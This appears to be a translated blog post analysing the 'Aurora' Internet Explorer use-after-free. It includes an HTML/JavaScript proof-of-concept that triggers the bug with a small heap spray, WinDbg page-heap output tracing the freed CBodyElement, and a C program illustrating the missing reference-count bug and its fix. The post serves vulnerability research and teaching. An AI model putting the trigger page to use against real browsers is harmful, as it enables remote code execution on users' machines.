The legendary Aurora vulnerability
Microsoft Internet Explorer Invalid Event Operation Memory Corruption Vulnerability
Microsoft Internet Explorer is the web browser bundled by default with Microsoft's Windows operating system.
Microsoft Internet Explorer has a memory corruption vulnerability in its handling of invalid event operations. Because the corresponding reference count is not incremented after an object is created, a malicious sequence of object operations can leave a pointer referring to memory that has been freed and then reused; a remote attacker can execute arbitrary instructions on the user's system by enticing the user to open a malicious web page that manipulates memory in this way.
The PoC is as follows:
<html>
<head>
<script>
var obj, event_obj;

function ev1(evt) {
    // The event object keeps a pointer to the element that fired the event.
    event_obj = document.createEventObject(evt);
    // Removing the span frees the element the event object still refers to.
    document.getElementById("sp1").innerHTML = "";
    window.setInterval(ev2, 1);
}

function ev2() {
    var data, tmp;
    data = "";
    tmp = unescape("%u0a0a%u0a0a");
    for (var i = 0 ; i < 4 ; i++) data += tmp;
    for (i = 0 ; i < obj.length ; i++ ) {
        obj[i].data = data;
    }
    // Touching srcElement dereferences the freed element.
    event_obj.srcElement;
}

obj = new Array();
event_obj = null;
for (var i = 0; i < 200 ; i++ ) obj[i] = document.createElement("COMMENT");
</script>
</head>
<body>
<span id="sp1">
<img src="aurora.gif" onload="ev1(event)">
</span>
</body>
</html>
I couldn't find a suitable PoC; this one I adapted from an exploit found online, and it is somewhat clumsy.
Getting straight to the point: the debugger output shows directly that the UAF occurs on a CBody object.
1:020> g
(c60.b2c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=04f8ef08 ebx=ffffffff ecx=07540fc8 edx=041bf0f4 esi=07540fc8 edi=06c64fb0
eip=6837c400 esp=041bf0e4 ebp=041bf0fc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CElement::Doc:
6837c400 8b01            mov     eax,dword ptr [ecx]  ds:0023:07540fc8=????????
1:020> !heap -p -a ecx
    address 07540fc8 found in
    _DPH_HEAP_ROOT @ 1b1000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    7db21d4:          7540000             2000
    702290b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77285674 ntdll!RtlDebugFreeHeap+0x0000002f
    77247aca ntdll!RtlpFreeHeap+0x0000005d
    77212d68 ntdll!RtlFreeHeap+0x00000142
    7710f1ac kernel32!HeapFree+0x00000014
    683e0fa4 mshtml!CBodyElement::`scalar deleting destructor'+0x00000022
    68387dd0 mshtml!CBase::SubRelease+0x00000022
    6837c482 mshtml!CElement::PrivateRelease+0x0000002a
    6837b034 mshtml!PlainRelease+0x00000025
    683d669d mshtml!PlainTrackerRelease+0x00000014
    6bd0a6f1 jscript!VAR::Clear+0x0000005f
    6bd26d66 jscript!GcContext::Reclaim+0x000000b6
    6bd24309 jscript!GcContext::CollectCore+0x00000123
    6bd24a4a jscript!CScriptRuntime::Run+0x000039dc
    6bd15c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
    6bd15bfb jscript!ScrFncObj::Call+0x0000008d
    6bd15e11 jscript!CSession::Execute+0x0000015f
    6bd0f3ee jscript!NameTbl::InvokeDef+0x000001b5
    6bd0ea2e jscript!NameTbl::InvokeEx+0x0000012c
    6bd096de jscript!NameTbl::Invoke+0x00000070
    6834aa7b mshtml!CWindow::ExecuteTimeoutScript+0x00000087
    6834ab66 mshtml!CWindow::FireTimeOut+0x000000b6
    68376af7 mshtml!CStackPtrAry<unsigned long,12>::GetStackSize+0x000000b6
    68371e57 mshtml!GlobalWndProc+0x00000183
    76c686ef USER32!InternalCallWinProc+0x00000023
    76c68876 USER32!UserCallWinProcCheckWow+0x0000014b
    76c689b5 USER32!DispatchMessageWorker+0x0000035e
    76c68e9c USER32!DispatchMessageW+0x0000000f
    6ea704a6 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000452
    6ea80446 IEFRAME!LCIETab_ThreadProc+0x000002c1
    76a749bd iertutil!CIsoScope::RegisterThread+0x000000ab
    77111174 kernel32!BaseThreadInitThunk+0x0000000e
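The advisory's root cause is a missing reference-count increment: an object that keeps a pointer to the element never takes its own reference, so when the DOM releases the element (the CBase::SubRelease to CBodyElement destructor chain in the page-heap trace above) the pointer is left dangling. The following C program is an added illustration of that bug class and of its fix; it is not mshtml code, and the Element/EventObject types, the single refcount field and the scenario functions are all assumptions that model the description only conceptually. Instead of calling free() on the last release it sets a flag, so the dangling access can be detected deterministically rather than relying on undefined behaviour (the page-heap output above serves that role in the real debugging session).

```c
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Toy model of a reference-counted element (assumption: this mirrors the
 * advisory's description conceptually, not any real mshtml structure). */
typedef struct Element {
    int  refcount;
    char tag[16];
    bool destroyed;   /* demo bookkeeping: set when the last reference goes away */
} Element;

/* Stand-in for the object returned by document.createEventObject(evt),
 * which keeps a srcElement pointer. */
typedef struct EventObject {
    Element *srcElement;
} EventObject;

static Element *element_create(const char *tag) {
    Element *e = calloc(1, sizeof *e);
    if (e == NULL) abort();
    strncpy(e->tag, tag, sizeof e->tag - 1);
    e->refcount = 1;   /* the reference held by the DOM tree */
    return e;
}

static void element_addref(Element *e) { e->refcount++; }

/* Drop one reference. On the last one the object is "destroyed"; the demo
 * sets a flag instead of calling free() so a later access can be checked
 * deterministically (reading really freed memory is undefined behaviour). */
static void element_release(Element *e) {
    if (--e->refcount == 0) e->destroyed = true;
}

static bool element_is_live(const Element *e) { return !e->destroyed; }

/* Flow the advisory describes: the event object stores the element pointer
 * without taking a reference. When innerHTML = "" makes the DOM drop its own
 * reference, the element is destroyed while evt.srcElement still points at
 * it; the later srcElement access is a use-after-free.
 * Returns true when the access hits a destroyed object. */
static bool scenario_missing_addref(void) {
    Element *img = element_create("IMG");
    EventObject evt = { .srcElement = img };   /* bug: no addref here */
    element_release(img);                      /* DOM releases -> refcount 0 */
    bool dangling = !element_is_live(evt.srcElement);
    free(img);                                 /* demo cleanup only */
    return dangling;
}

/* Corrected flow: the event object takes its own reference, so the element
 * outlives the DOM's release and the access is safe.
 * Returns true only if the access would hit a destroyed object (expected: false). */
static bool scenario_with_addref(void) {
    Element *img = element_create("IMG");
    EventObject evt = { .srcElement = img };
    element_addref(img);                       /* event object owns a reference */
    element_release(img);                      /* DOM releases -> refcount 1 */
    bool dangling = !element_is_live(evt.srcElement);
    element_release(evt.srcElement);           /* event object released -> 0 */
    free(img);
    return dangling;
}

int main(void) {
    printf("missing addref: use-after-free = %s\n",
           scenario_missing_addref() ? "yes" : "no");
    printf("with addref:    use-after-free = %s\n",
           scenario_with_addref() ? "yes" : "no");
    return 0;
}
```

The fix is the single element_addref call in the second scenario: every holder of a raw pointer to a refcounted object must own a reference for as long as it may dereference that pointer, and the release that pairs with it must happen when the holder goes away, not before.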
Allocation
Original post: http://www.cnblogs.com/Ox9A82/p/5837769.html